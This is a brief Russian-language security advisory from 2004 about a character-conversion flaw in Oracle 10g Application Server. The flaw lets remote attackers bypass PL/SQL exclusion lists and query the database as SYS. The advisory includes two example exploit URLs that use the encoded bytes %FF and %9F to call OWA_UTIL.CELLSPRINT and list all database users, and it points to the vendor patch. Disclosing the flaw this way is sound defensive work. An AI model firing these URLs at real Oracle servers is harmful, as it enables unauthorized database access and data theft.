Обход ограничений в Oracle 10g/AS

Дата публикации:
24.12.2004
Всего просмотров:
958
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Oracle 10g AS

Описание:
Обнаружена уязвимость в Oracle 10g/AS. Удаленный атакующий может повысить свои привилегии на системе.

Уязвимость существует из-за ошибки при конвертации символов. Удаленный атакующий может обойти pl/sql исключения и получить доступ к серверу баз данных от имени SYS. Примеры:

http://server/pls/windad/S%FFS.OWA_UTIL.CELLSPRINT?P_THEQUERY=select+username+from+all_users

http://server/pls/windad/S%9FS.OWA_UTIL.CELLSPRINT?P_THEQUERY=select+username+from+all_users

URL производителя: oracle.com

Решение: Установите обновление с сайта :
http://metalink.oracle.com

Ссылки: Oracle 10g/AS on all operating systems

или введите имя

CAPTCHA